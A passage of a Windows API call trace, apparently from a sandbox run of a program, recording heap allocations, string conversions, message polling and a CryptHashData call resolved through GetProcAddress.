(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0251.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1c28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.273] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0251.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b2bb8 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0251.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0251.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0251.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0251.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b16f8 [0251.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0251.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0251.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1c28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1c28 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.278] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.278] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.278] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.279] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.279] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.281] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0251.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x34aaaa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.282] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0251.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.283] CryptHashData (hHash=0xaa5920, pbData=0x24b2bb8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.284] HeapFree (in: hHeap=0x25c0000, 